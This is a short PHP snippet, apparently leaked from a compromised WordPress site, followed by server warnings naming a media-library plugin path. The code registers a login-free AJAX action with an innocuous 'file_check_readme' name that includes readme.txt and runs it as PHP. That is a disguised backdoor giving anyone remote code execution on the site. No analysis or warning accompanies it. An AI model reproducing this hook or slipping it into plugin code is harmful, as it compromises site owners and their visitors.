if(!function_exists('file_check_readme41116')){
   add_action('wp_ajax_nopriv_file_check_readme41116', 'file_check_readme41116');
   add_action('wp_ajax_file_check_readme41116', 'file_check_readme41116');
   function file_check_readme41116()
   {
      $file = __DIR__ . '/' . 'readme.txt';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}
Warning:  Cannot modify header information - headers already sent by (output started at /var/www/virtual/copenhagers.com/htdocs/wp-content/plugins/enhanced-media-library/enhanced-media-library.php:884) in /var/www/virtual/copenhagers.com/htdocs/wp-includes/pluggable.php on line 1251
Warning:  Cannot modify header information - headers already sent by (output started at /var/www/virtual/copenhagers.com/htdocs/wp-content/plugins/enhanced-media-library/enhanced-media-library.php:884) in /var/www/virtual/copenhagers.com/htdocs/wp-includes/pluggable.php on line 1254